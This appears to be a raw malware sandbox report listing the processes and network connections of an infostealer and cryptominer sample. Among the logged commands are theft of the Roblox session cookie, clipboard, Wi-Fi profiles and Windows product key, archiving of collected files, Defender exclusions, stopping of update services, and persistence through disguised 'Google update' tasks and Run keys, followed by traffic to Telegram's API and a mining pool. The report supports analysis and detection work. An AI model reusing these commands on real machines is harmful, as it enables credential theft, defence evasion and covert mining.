mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('join discord.gg/input for support', 0, 'INPUT v2', 48+16);close()"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\ProgramData\setup.exe

"C:\ProgramData\setup.exe"

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u3katkwy\u3katkwy.cmdline"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB80.tmp" "c:\Users\Admin\AppData\Local\Temp\u3katkwy\CSC6AC69D7B17754E838FECA98EB612E886.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\1M7c4.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI39802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI39802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\1M7c4.zip" *

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD6F7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD6F7.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 1680"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 412 -p 3304 -ip 3304

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3304 -s 2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.179.227:443 gstatic.com tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
GB 142.250.187.228:80 www.google.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 23.180.102.163:80 tcp
US 209.149.75.78:80 tcp
US 140.226.28.163:80 tcp
US 21.127.195.67:80 tcp
HK 103.44.162.117:80 tcp
NO 88.88.253.68:80 tcp
US 214.219.222.5:80 tcp
CR 201.193.123.198:80 tcp
US 8.8.8.8:53 api.telegram.org udp
FJ 144.120.170.173:80 tcp
CN 42.90.78.3:80 tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 30.104.185.65:80 tcp
US 44.92.150.77:80 tcp
JP 60.159.173.159:80 tcp
US 74.26.132.234:80 tcp
US 174.25.158.107:80 tcp
SG 43.57.219.36:80 tcp
FR 139.54.60.175:80 tcp
US 52.23.141.162:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 144.251.188.55:80 tcp
US 29.190.59.165:80 tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 108.37.161.79:80 tcp
CN 123.172.6.125:80 tcp
US 108.147.187.16:80 tcp
US 209.8.172.81:80 tcp
ES 87.216.225.100:80 tcp
US 8.232.105.187:80 tcp
US 19.44.87.0:80 tcp
US 13.255.235.149:80 tcp
SG 43.98.188.30:80 tcp
US 4.135.232.80:80 tcp
US 208.95.112.1:80 ip-api.com tcp
US 11.53.37.228:80 tcp
US 45.83.133.155:80 tcp
EG 156.203.77.234:80 tcp
US 171.151.201.16:80 tcp
JP 219.62.175.200:80 tcp
JP 150.18.19.250:80 tcp
US 98.215.166.55:80 tcp
CN 182.242.189.169:80 tcp
HK 156.224.84.36:80 tcp
US 48.169.236.253:80 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
AU 147.41.128.220:80 tcp
US 4.140.107.194:80 tcp
US 159.123.31.223:80 tcp
US 134.24.122.231:80 tcp
CN 210.15.84.238:80 tcp
CN 8.132.195.141:80 tcp
JP 157.6.73.141:80 tcp
DE 37.89.191.4:80 tcp
US 34.114.233.30:80 tcp
RU 212.83.2.123:80 tcp
AT 157.247.50.60:80 tcp
AU 103.0.45.160:80 tcp
CA 166.48.70.47:80 tcp
KR 14.94.12.52:80 tcp
KR 42.27.141.187:80 tcp
US 32.132.105.225:80 tcp
CN 112.36.125.231:80 tcp
US 23.167.165.243:80 tcp
US 170.23.52.145:80 tcp
CN 139.227.62.207:80 tcp
US 140.31.236.114:80 tcp
FI 212.94.73.244:80 tcp
KR 49.27.236.18:80 tcp
US 19.146.135.187:80 tcp
BG 95.111.122.65:80 tcp
US 135.248.97.254:80 tcp
US 55.94.73.151:80 tcp
CN 117.167.29.0:80 tcp
JP 210.224.171.47:80 tcp
US 1.186.174.26:80 tcp
US 75.38.121.194:80 tcp
IR 37.32.35.157:80 tcp
MX 140.99.216.71:80 tcp
US 11.29.165.176:80 tcp
AT 195.202.146.144:80 tcp
US 208.175.116.118:80 tcp
US 156.87.98.31:80 tcp
DE 20.52.239.33:80 tcp
US 99.5.153.123:80 tcp
DE 84.165.163.204:80 tcp
N/A 10.230.146.117:80 tcp
US 16.61.103.10:80 tcp
DE 62.214.24.26:80 tcp
IM 78.24.208.132:80 tcp
RU 85.202.246.205:80 tcp
US 3.224.196.250:80 tcp
DE 62.96.58.215:80 tcp
JP 106.131.35.87:80 tcp
US 67.189.63.179:80 tcp
ES 37.156.109.65:80 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
JP 124.255.33.146:80 tcp
JP 202.61.24.90:80 tcp
US 172.46.194.138:80 tcp
SE 90.232.200.81:80 tcp
ES 149.7.65.56:80 tcp
BR 191.36.234.142:80 tcp
RU 194.226.59.100:80 tcp
US 216.60.208.114:80 tcp
BR 179.105.67.203:80 tcp
IT 151.45.232.123:80 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
FR 81.194.168.179:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 164.181.2.62:80 tcp
GB 109.146.38.19:80 tcp
CL 190.54.140.93:80 tcp
KR 59.4.124.115:80 tcp
US 71.205.251.164:80 tcp
US 21.125.53.26:80 tcp
SG 43.35.20.5:80 tcp
BR 15.228.236.108:80 tcp
US 9.244.80.156:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
CN 36.248.96.136:80 tcp
CN 222.73.164.197:80 tcp
RU 86.102.96.53:80 tcp
JP 150.99.35.196:80 tcp
US 7.145.164.12:80 tcp
US 160.110.251.153:80 tcp
CN 122.49.22.23:80 tcp
US 19.20.241.152:80 tcp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
IL 109.253.218.127:80 tcp
CN 39.97.7.90:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
JP 42.147.243.72:80 tcp
ID 36.90.50.234:80 tcp
MA 105.79.145.40:80 tcp
US 169.3.129.166:80 tcp
DE 84.184.75.127:80 tcp
CO 186.81.6.161:80 tcp
US 23.96.72.123:80 tcp
US 35.142.3.38:80 tcp
NG 105.123.61.149:80 tcp
US 172.223.124.110:80 tcp
ID 36.90.50.234:80 36.90.50.234 tcp
US 8.8.8.8:53 234.50.90.36.in-addr.arpa udp
CN 103.236.99.196:80 tcp
DE 51.214.43.105:80 tcp
AU 58.175.169.109:80 tcp
CN 180.100.167.200:80 tcp
ES 87.111.127.73:80 tcp
CA 142.201.37.127:80 tcp
US 206.63.157.171:80 tcp
US 167.93.17.162:80 tcp
US 214.124.250.163:80 tcp
JP 150.30.45.41:80 tcp
IQ 212.15.87.83:80 tcp
US 35.26.120.112:80 tcp
US 140.11.190.136:80 tcp
CN 123.86.133.126:80 tcp
US 104.175.103.28:80 tcp
JP 158.206.116.50:80 tcp
KR 61.108.64.146:80 tcp
MU 196.194.180.49:80 tcp
CN 110.43.11.206:80 tcp
FR 82.64.219.9:80 tcp
HU 31.46.34.114:80 tcp
CN 110.127.213.234:80 tcp
US 76.103.35.47:80 tcp
KR 168.219.140.121:80 tcp
CN 118.229.24.164:80 tcp
US 48.117.142.60:80 tcp
RU 84.253.103.35:80 tcp
GE 95.104.13.103:80 tcp
KR 223.44.77.3:80 tcp
US 108.89.124.124:80 tcp
US 184.158.7.110:80 tcp
GB 34.89.60.6:80 tcp
NL 145.185.245.141:80 tcp
AU 1.129.154.111:80 tcp
CN 101.227.22.212:80 tcp
IN 101.210.20.38:80 tcp
US 64.123.178.86:80 tcp
EG 154.132.247.82:80 tcp
US 162.180.194.85:80 tcp
US 215.229.57.138:80 tcp
GB 95.151.238.201:80 tcp
US 161.240.240.103:80 tcp
US 32.166.25.116:80 tcp
JP 124.87.18.91:80 tcp
US 140.42.94.234:80 tcp
US 55.176.96.140:80 tcp
CN 106.235.101.225:80 tcp
IN 122.172.247.104:80 tcp
US 32.255.241.94:80 tcp
CH 86.118.9.241:80 tcp
US 141.153.221.51:80 tcp
US 142.129.200.63:80 tcp
US 75.136.115.205:80 tcp
US 159.169.12.177:80 tcp
US 132.172.255.5:80 tcp
US 160.151.29.81:80 tcp
IR 5.106.186.167:80 tcp
US 100.223.182.251:80 tcp
US 4.126.59.172:80 tcp
CN 36.100.255.0:80 tcp
IT 37.226.98.140:80 tcp
US 50.107.68.79:80 tcp
CN 218.10.70.229:80 tcp
US 174.76.94.203:80 tcp
FR 92.163.68.121:80 tcp
US 137.46.47.191:80 tcp
CN 115.197.191.169:80 tcp
US 3.195.126.206:80 tcp
DE 53.154.124.218:80 tcp
US 131.77.93.42:80 tcp
US 192.173.43.182:80 tcp
HU 5.187.146.85:80 tcp
US 8.18.155.9:80 tcp
JP 220.50.85.143:80 tcp
NL 194.45.32.56:80 tcp
CN 113.126.7.83:80 tcp
CH 171.27.93.56:80 tcp
US 136.215.242.252:80 tcp
US 19.223.3.238:80 tcp
ES 154.62.246.52:80 tcp
MU 196.194.255.199:80 tcp
MX 189.128.194.27:80 tcp
US 146.222.196.52:80 tcp
RU 78.138.140.88:80 tcp
US 33.41.129.45:80 tcp
JP 126.255.174.247:80 tcp
CN 39.164.221.37:80 tcp
US 50.220.251.185:80 tcp
MX 189.245.204.142:80 tcp
US 146.151.192.162:80 tcp
US 131.240.154.195:80 tcp
GR 62.38.88.47:80 tcp
US 173.215.50.206:80 tcp
CN 116.138.236.220:80 tcp
US 152.124.10.222:80 tcp
PE 196.19.215.82:80 tcp
NO 88.93.184.145:80 tcp
US 76.60.41.11:80 tcp
JP 175.131.17.118:80 tcp
US 64.169.129.58:80 tcp
CA 96.51.61.250:80 tcp
CN 42.131.63.68:80 tcp
KR 42.32.173.63:80 tcp
US 23.188.90.122:80 tcp
GB 213.5.88.250:80 tcp
US 155.48.182.141:80 tcp
US 144.170.240.208:80 tcp
NL 86.90.201.106:80 tcp
US 48.190.141.169:80 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:443 pool.hashvault.pro tcp
SY 185.246.78.115:80 tcp
GB 90.253.103.9:80 tcp
JP 160.204.81.223:80 tcp
IT 62.101.12.218:80 tcp
CA 72.11.161.73:80 tcp
US 75.131.119.14:80 tcp
TW 165.154.14.161:80 tcp
CN 171.120.77.44:80 tcp
FR 92.161.119.63:80 tcp
SA 5.111.132.98:80 tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
ZA 197.83.22.48:80 tcp
US 7.236.120.148:80 tcp
IT 217.221.9.200:80 tcp
UA 46.96.51.249:80 tcp
US 164.76.143.91:80 tcp
IN 202.54.133.35:80 tcp
US 149.118.38.244:80 tcp
US 184.90.101.160:80 tcp
US 26.57.157.137:80 tcp
AR 186.62.212.243:80 tcp
ES 90.166.177.188:80 tcp
US 43.215.255.253:80 tcp
BR 187.107.200.209:80 tcp
RU 176.52.108.83:80 tcp
CA 38.69.147.106:80 tcp
US 136.166.18.4:80 tcp
US 151.104.211.15:80 tcp
US 23.251.26.34:80 tcp
CN 42.97.42.157:80 tcp
US 97.19.113.232:80 tcp
HR 31.147.74.73:80 tcp
US 66.132.10.136:80 tcp
RO 89.33.35.96:80 tcp
CN 120.248.211.155:80 tcp
CN 101.86.147.183:80 tcp
US 108.122.48.105:80 tcp
GB 94.196.0.26:80 tcp
US 29.92.39.165:80 tcp
US 11.126.88.100:80 tcp
US 161.6.49.130:80 tcp
US 44.176.40.6:80 tcp
KR 14.73.140.250:80 tcp
US 64.95.63.22:80 tcp
US 68.238.24.233:80 tcp
US 104.250.237.239:80 tcp
IT 151.13.0.134:80 tcp
US 12.209.15.133:80 tcp
US 161.249.39.137:80 tcp
CN 123.11.134.107:80 tcp
US 20.132.165.143:80 tcp
US 18.219.186.81:80 tcp
NL 145.81.247.57:80 tcp
US 128.252.215.14:80 tcp
US 214.52.133.7:80 tcp
US 138.98.166.136:80 tcp
DE 53.115.13.100:80 tcp
IN 61.3.58.31:80 tcp
DZ 105.108.211.148:80 tcp
US 208.139.248.205:80 tcp
FR 145.240.57.105:80 tcp
AR 190.138.164.68:80 tcp
US 68.237.133.198:80 tcp
US 209.69.95.9:80 tcp
JP 180.87.32.75:80 tcp
KR 221.154.197.86:80 tcp
US 29.179.33.206:80 tcp
US 48.17.61.168:80 tcp
JP 60.83.15.179:80 tcp
N/A 100.124.70.65:80 tcp
US 99.109.168.7:80 tcp
IT 83.158.92.98:80 tcp
US 209.184.63.30:80 tcp
FR 46.21.123.96:80 tcp
HU 89.223.189.97:80 tcp
US 15.145.55.32:80 tcp
GB 195.172.38.136:80 tcp
NL 194.110.221.7:80 tcp
US 151.181.198.198:80 tcp
US 170.1.157.208:80 tcp
CN 42.100.212.170:80 tcp
KR 115.8.71.79:80 tcp
US 50.3.201.203:80 tcp
US 72.82.12.94:80 tcp
AR 181.21.45.21:80 tcp
JP 133.171.84.2:80 tcp
US 132.198.209.217:80 tcp
US 50.3.201.203:80 50.3.201.203 tcp
US 12.113.219.254:80 tcp
GB 25.233.151.100:80 tcp
ES 81.41.145.196:80 tcp
IN 65.3.89.187:80 tcp
US 8.8.8.8:53 203.201.3.50.in-addr.arpa udp
US 137.159.224.165:80 tcp
US 67.162.98.14:80 tcp
JP 124.36.219.46:80 tcp
AT 84.113.168.163:80 tcp
CN 36.19.52.137:80 tcp
US 51.232.101.217:80 tcp
CN 218.66.112.74:80 tcp
US 69.41.234.142:80 tcp
VN 27.77.3.195:80 tcp
BR 129.148.23.15:80 tcp
US 66.142.244.232:80 tcp
US 137.117.113.130:80 tcp
US 66.142.244.232:80 66.142.244.232 tcp
CN 171.117.76.27:80 tcp
IT 193.206.51.38:80 tcp
US 73.163.94.229:80 tcp
JP 211.125.115.6:80 tcp
US 7.245.255.35:80 tcp
CA 156.11.123.40:80 tcp
US 8.8.8.8:53 232.244.142.66.in-addr.arpa udp
US 56.42.97.233:80 tcp
US 98.157.10.252:80 tcp
US 8.67.80.80:80 tcp
SG 20.198.149.62:80 tcp
US 173.66.214.207:80 tcp
US 66.143.97.23:80 tcp
UA 194.31.46.14:80 tcp
ID 27.112.69.205:80 tcp
BR 187.37.219.248:80 tcp
US 56.137.195.62:80 tcp
UA 194.31.46.14:80 194.31.46.14 tcp
GB 176.105.229.41:80 tcp
US 169.114.36.102:80 tcp
JP 60.81.135.42:80 tcp
CN 60.25.217.94:80 tcp
US 150.241.81.46:80 tcp
CA 99.249.20.255:80 tcp
US 165.15.105.39:80 tcp
US 8.8.8.8:53 14.46.31.194.in-addr.arpa udp
CA 99.216.125.174:80 tcp
US 52.24.68.240:80 tcp
US 136.49.102.84:80 tcp
US 24.192.63.216:80 tcp
US 129.50.221.250:80 tcp
CN 115.230.13.59:80 tcp
EG 196.140.229.90:80 tcp
MX 187.226.54.231:80 tcp
US 22.127.106.12:80 tcp
BR 201.131.147.225:80 tcp
CO 191.66.181.62:80 tcp
HK 156.250.101.35:80 tcp
SG 38.181.52.150:80 tcp
VN 14.176.93.61:80 tcp
US 192.128.42.1:80 tcp
SG 38.181.52.150:80 38.181.52.150 tcp
CN 115.215.81.86:80 tcp
US 38.223.9.17:80 tcp
US 8.8.8.8:53 150.52.181.38.in-addr.arpa udp
SE 13.50.26.141:80 tcp
SE 94.234.226.6:80 tcp
CN 27.225.12.92:80 tcp
DE 53.223.135.79:80 tcp
US 35.60.111.20:80 tcp
US 164.254.235.155:80 tcp
VE 201.209.190.209:80 tcp
US 214.49.221.192:80 tcp
US 29.187.21.245:80 tcp
US 165.237.240.208:80 tcp
CN 42.197.128.214:80 tcp
US 76.205.218.191:80 tcp
GB 31.121.84.239:80 tcp
SG 218.212.209.180:80 tcp
PE 179.7.191.233:80 tcp
US 28.117.38.160:80 tcp
US 51.51.142.252:80 tcp
CN 47.105.232.64:80 tcp
JP 219.112.24.93:80 tcp
US 12.42.206.202:80 tcp
PT 193.126.75.92:80 tcp
US 26.70.96.194:80 tcp
US 158.222.205.24:80 tcp
GB 109.148.216.199:80 tcp
DE 93.208.75.201:80 tcp
US 11.173.5.20:80 tcp
US 26.16.114.33:80 tcp
CA 24.200.203.81:80 tcp
US 153.61.206.154:80 tcp
US 167.76.19.69:80 tcp
KR 218.101.237.215:80 tcp
JP 34.97.234.40:80 tcp
US 71.95.103.135:80 tcp
IN 161.118.240.175:80 tcp
US 24.45.202.130:80 tcp
US 147.0.121.28:80 tcp
BH 56.186.178.139:80 tcp
NO 150.106.101.22:80 tcp
US 206.160.53.170:80 tcp
BR 143.106.154.193:80 tcp
VN 113.183.240.122:80 tcp
DE 46.142.204.224:80 tcp
US 165.203.205.73:80 tcp
SG 43.17.196.31:80 tcp
GB 213.39.62.125:80 tcp
JP 126.172.166.22:80 tcp
US 63.209.85.70:80 tcp
AU 203.54.252.154:80 tcp
US 17.10.4.200:80 tcp
US 12.66.160.10:80 tcp
TH 171.7.67.148:80 tcp
GB 86.137.115.106:80 tcp
US 32.54.108.225:80 tcp
US 11.144.67.177:80 tcp
GT 190.0.219.47:80 tcp
CN 112.91.178.43:80 tcp
US 184.154.226.181:80 tcp
CH 85.7.179.85:80 tcp
CN 118.133.162.214:80 tcp
US 4.64.102.64:80 tcp
US 146.242.232.237:80 tcp
FR 83.207.37.218:80 tcp
KR 168.219.51.8:80 tcp
CN 115.201.223.43:80 tcp
FR 212.195.79.117:80 tcp
LV 213.110.80.150:80 tcp
BR 186.245.243.67:80 tcp
FR 84.102.147.58:80 tcp
GB 51.246.129.177:80 tcp
US 139.161.234.119:80 tcp
AU 3.25.90.244:80 tcp
FR 84.5.134.206:80 tcp
DE 109.192.215.101:80 tcp
CL 200.68.55.147:80 tcp
US 11.23.130.39:80 tcp
US 33.63.149.26:80 tcp
US 215.68.95.159:80 tcp
GB 217.177.89.174:80 tcp
US 104.123.81.87:80 tcp
US 75.29.252.143:80 tcp
CN 114.216.145.144:80 tcp
CN 220.161.17.228:80 tcp
US 57.193.43.24:80 tcp
JP 59.138.47.201:80 tcp
US 7.36.142.64:80 tcp
GR 194.219.112.246:80 tcp
CN 123.74.253.175:80 tcp
GR 194.219.112.246:80 194.219.112.246 tcp
GB 161.35.34.124:80 tcp
GR 194.219.112.246:5000 194.219.112.246 tcp
US 8.8.8.8:53 246.112.219.194.in-addr.arpa udp
US 173.142.234.72:80 tcp
KG 212.241.26.154:80 tcp
US 24.219.116.84:80 tcp
US 131.148.1.154:80 tcp
US 24.156.54.44:80 tcp
TN 102.105.99.195:80 tcp
US 209.178.231.168:80 tcp
MX 177.249.14.214:80 tcp
US 71.57.156.174:80 tcp
US 22.161.14.58:80 tcp
US 13.103.255.47:80 tcp
US 164.204.236.29:80 tcp
DE 130.73.205.235:80 tcp
JP 60.126.88.56:80 tcp
CN 221.173.108.13:80 tcp
MX 187.160.173.93:80 tcp
CN 118.133.121.25:80 tcp
US 66.20.29.102:80 tcp
CN 42.253.94.129:80 tcp
CH 188.154.75.126:80 tcp
CN 115.59.81.68:80 tcp
US 44.126.196.4:80 tcp
AR 181.23.127.104:80 tcp
CN 43.185.46.151:80 tcp
BR 187.59.128.156:80 tcp
IN 183.87.9.115:80 tcp
CN 117.81.5.144:80 tcp
US 26.43.63.147:80 tcp
SA 5.25.73.59:80 tcp
CN 27.204.216.231:80 tcp
US 129.42.115.70:80 tcp
RU 213.165.220.250:80 tcp
CN 202.136.248.241:80 tcp
CN 101.7.203.161:80 tcp
CN 115.52.65.223:80 tcp
US 108.105.221.20:80 tcp
FR 88.183.52.176:80 tcp
DE 195.125.63.185:80 tcp
US 66.99.164.159:80 tcp
MY 161.139.52.238:80 tcp
DE 2.247.199.169:80 tcp
US 55.249.160.181:80 tcp
GB 25.154.113.163:80 tcp
US 32.252.104.115:80 tcp
TH 122.8.153.9:80 tcp
